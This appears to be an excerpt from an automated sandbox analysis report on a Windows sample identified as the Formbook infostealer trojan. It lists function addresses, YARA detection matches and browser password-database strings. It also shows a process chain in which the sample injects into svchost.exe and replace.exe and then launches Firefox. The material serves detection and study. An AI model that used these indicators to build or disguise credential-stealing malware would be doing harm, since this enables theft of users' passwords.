            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE12ED2_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B2C02_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE02742_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4B1B02_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C001AA2_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF81CC2_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDA1182_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0B16B2_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B301002_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B2F1722_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7516C2_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF70E92_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF0E02_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEF0CC2_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B470C02_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF7B02_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3C7C02_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B407702_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B647502_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5C6E02_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF16CC2_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDD5B02_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C005912_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B405352_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF75712_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEE4F62_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFF43F2_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B314602_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF24462_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FB802_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B7DBF92_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF6BD72_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFB762_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFAB402_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BDDAAC2_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B85AA02_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3EA802_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BEDAC62_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB3A6C2_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFA492_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7A462_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B429A02_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C0A9A62_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B569622_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B499502_2_03B49950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5B9502_2_03B5B950
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B268B82_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B6E8F02_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B438E02_2_03B438E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BAD8002_2_03BAD800
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B428402_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4A8402_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFFB12_2_03BFFFB1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B41F922_2_03B41F92
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4CFE02_2_03B4CFE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B32FC82_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B60F302_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B82F282_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFF092_2_03BFFF09
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB4F402_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B49EB02_2_03B49EB0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B52E902_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFCE932_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEEDB2_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFEE262_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40E592_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B58DBF2_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B3ADE02_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B5FDC02_2_03B5FDC0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B4AD002_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF7D732_2_03BF7D73
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BF1D5A2_2_03BF1D5A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B43D402_2_03B43D40
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BE0CB52_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B30CF22_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BFFCF22_2_03BFFCF2
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03BB9C322_2_03BB9C32
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B40C002_2_03B40C00
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_026FF9453_2_026FF945
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_027080743_2_02708074
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_0270806F3_2_0270806F
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_027019143_2_02701914
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_027016F43_2_027016F4
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_027016EB3_2_027016EB
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_02709E8F3_2_02709E8F
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 3_2_027205243_2_02720524
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6B2C04_2_02C6B2C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CF12ED4_2_02CF12ED
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C552A04_2_02C552A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CF02744_2_02CF0274
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5E3F04_2_02C5E3F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D103E64_2_02D103E6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C9739A4_2_02C9739A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0A3524_2_02D0A352
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C3D34C4_2_02C3D34C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0132D4_2_02D0132D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CFF0CC4_2_02CFF0CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C570C04_2_02C570C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0F0E04_2_02D0F0E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D070E94_2_02D070E9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D081CC4_2_02D081CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5B1B04_2_02C5B1B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D101AA4_2_02D101AA
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CD81584_2_02CD8158
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C8516C4_2_02C8516C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C3F1724_2_02C3F172
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D1B16B4_2_02D1B16B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C401004_2_02C40100
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CEA1184_2_02CEA118
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D016CC4_2_02D016CC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6C6E04_2_02C6C6E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C4C7C04_2_02C4C7C0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0F7B04_2_02D0F7B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C747504_2_02C74750
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C507704_2_02C50770
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CFE4F64_2_02CFE4F6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D024464_2_02D02446
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C414604_2_02C41460
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0F43F4_2_02D0F43F
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D105914_2_02D10591
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CED5B04_2_02CED5B0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D075714_2_02D07571
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C505354_2_02C50535
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CFDAC64_2_02CFDAC6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C4EA804_2_02C4EA80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CEDAAC4_2_02CEDAAC
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C95AA04_2_02C95AA0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D07A464_2_02D07A46
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FA494_2_02D0FA49
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC3A6C4_2_02CC3A6C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D06BD74_2_02D06BD7
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C8DBF94_2_02C8DBF9
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC5BF04_2_02CC5BF0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6FB804_2_02C6FB80
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0AB404_2_02D0AB40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FB764_2_02D0FB76
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C538E04_2_02C538E0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C7E8F04_2_02C7E8F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C368B84_2_02C368B8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C528404_2_02C52840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5A8404_2_02C5A840
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CBD8004_2_02CBD800
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C529A04_2_02C529A0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D1A9A64_2_02D1A9A6
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C599504_2_02C59950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6B9504_2_02C6B950
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C669624_2_02C66962
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0EEDB4_2_02D0EEDB
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0CE934_2_02D0CE93
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C62E904_2_02C62E90
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C59EB04_2_02C59EB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C50E594_2_02C50E59
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0EE264_2_02D0EE26
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C42FC84_2_02C42FC8
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5CFE04_2_02C5CFE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C51F924_2_02C51F92
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FFB14_2_02D0FFB1
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC4F404_2_02CC4F40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FF094_2_02D0FF09
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C92F284_2_02C92F28
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C70F304_2_02C70F30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D0FCF24_2_02D0FCF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C40CF24_2_02C40CF2
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CF0CB54_2_02CF0CB5
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C50C004_2_02C50C00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02CC9C324_2_02CC9C32
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C6FDC04_2_02C6FDC0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C4ADE04_2_02C4ADE0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C68DBF4_2_02C68DBF
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C53D404_2_02C53D40
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D01D5A4_2_02D01D5A
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02D07D734_2_02D07D73
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_02C5AD004_2_02C5AD00
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001418F04_2_001418F0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001311214_2_00131121
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_001431904_2_00143190
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0014318B4_2_0014318B
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0015B6404_2_0015B640
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013C8104_2_0013C810
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013C8074_2_0013C807
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013CA304_2_0013CA30
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0013AAB04_2_0013AAB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_00144FB04_2_00144FB0
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093E1E44_2_0093E1E4
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093E30D4_2_0093E30D
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093E69C4_2_0093E69C
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093D7084_2_0093D708
            Source: C:\Windows\SysWOW64\replace.exeCode function: 4_2_0093C9C84_2_0093C9C8
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050FBFE78_2_050FBFE7
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_051126778_2_05112677
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F89278_2_050F8927
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050E81588_2_050E8158
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050FA1C78_2_050FA1C7
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050FA1C28_2_050FA1C2
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F383E8_2_050F383E
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F38478_2_050F3847
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F3A678_2_050F3A67
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeCode function: 8_2_050F1AE78_2_050F1AE7
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B75130 appears 36 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BBF290 appears 105 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03BAEA12 appears 86 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B2B970 appears 268 times
            Source: C:\Windows\SysWOW64\svchost.exeCode function: String function: 03B87E54 appears 88 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02C97E54 appears 95 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02C3B970 appears 268 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02CBEA12 appears 86 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02C85130 appears 36 times
            Source: C:\Windows\SysWOW64\replace.exeCode function: String function: 02CCF290 appears 105 times
            Source: YSjOEAta07.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000008.00000002.3172358807.00000000050E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3169852732.00000000007D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3169964546.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1489720857.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1487968090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000003.00000002.3169911650.0000000002470000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.3167311472.0000000000130000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000002.00000002.1488814205.00000000039A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/2@11/9
            Source: C:\Users\user\Desktop\YSjOEAta07.exeFile created: C:\Users\user\AppData\Local\Temp\MaianthemumJump to behavior
            Source: YSjOEAta07.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\YSjOEAta07.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\YSjOEAta07.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: replace.exe, 00000004.00000002.3167953756.0000000000644000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.0000000000692000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1672212746.0000000000671000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000002.3167953756.0000000000667000.00000004.00000020.00020000.00000000.sdmp, replace.exe, 00000004.00000003.1670088273.0000000000667000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: YSjOEAta07.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\YSjOEAta07.exeFile read: C:\Users\user\Desktop\YSjOEAta07.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\YSjOEAta07.exe "C:\Users\user\Desktop\YSjOEAta07.exe"
            Source: C:\Users\user\Desktop\YSjOEAta07.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YSjOEAta07.exe"
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\YSjOEAta07.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\YSjOEAta07.exe"Jump to behavior
            Source: C:\Program Files (x86)\nAEwFNjrDKmEnHYevQyBsADnPXAqBgVjtCsIwACn\GmuPchEfAM.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
